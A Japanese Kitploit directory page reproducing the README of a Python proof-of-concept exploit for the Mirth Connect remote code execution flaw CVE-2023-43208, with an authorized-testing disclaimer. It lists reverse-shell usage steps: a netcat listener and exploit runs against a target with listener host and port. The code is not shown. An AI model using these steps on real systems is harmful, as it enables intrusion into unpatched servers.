Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-43208 — CVE-2023-43208 RCE悪用のためのPoC。 | Kitploit
ツール/GitHubGitHub/predyy/cve-2023-43208
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubpredyy/cve-2023-43208

CVE-2023-43208

CVE-2023-43208 RCE悪用のためのPoC。

リポジトリを見る
116ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-43208 Mirth Connect RCE PoC

Mirth Connect の CVE-2023-43208 を標的とした概念実証 Python スクリプトです。

Disclaimer

自分が所有している、または明示的にテストを許可された環境でのみ使用してください。このリポジトリは、セキュリティ研究、検証、および防御テストを目的としています。作者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。

Overview

exp.py は PoC の依存関係を最小限にしたバージョンであり、以下を行います:

  • 対象が Mirth Connect インスタンスであるかどうかを検出します
  • /api/server/version から Mirth Connect のバージョンを取得します
  • バージョンが 4.4.1 より低いかどうかを確認します
  • 対象が脆弱であると思われる場合、/api/users に XML ペイロードを送信します

このスクリプトはデフォルトで HTTPS を使用し、--http で HTTP に切り替えることができます。

Usage

root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

Arguments

  • -u, --url: 対象の Mirth Connect URL またはホスト
  • -lh, --lhost: リバース接続用のローカルホスト/IP
  • -lp, --lport: ローカルのリスニングポート
  • --http: HTTPS の代わりに HTTP を強制します (デフォルトは HTTPS)

Example

まずリスナーを起動します:

root@kitploit:~
nc -lvnp 4444

スクリプトを実行します:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

HTTP のみのターゲットの場合:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

Notes

  • このスクリプトでは SSL 証明書の検証が無効になっています。
  • このスクリプトはペイロードを送信する前に確認を求めます。
  • バージョン検出は 4.4.1 とのセマンティック比較に基づいています。
  • Mirth Connect として検出されたターゲットでも、必ずしも悪用可能であるとは限りません (ネットワーク、環境、ランタイムの違いが結果に影響する可能性があります)。

Credits

  • 脆弱性の最初の発見者: IHTeam
  • オリジナルコード: K3ysTr0K3R および Chocapikk
  • 依存関係最小限版: predyy
ツールをダウンロード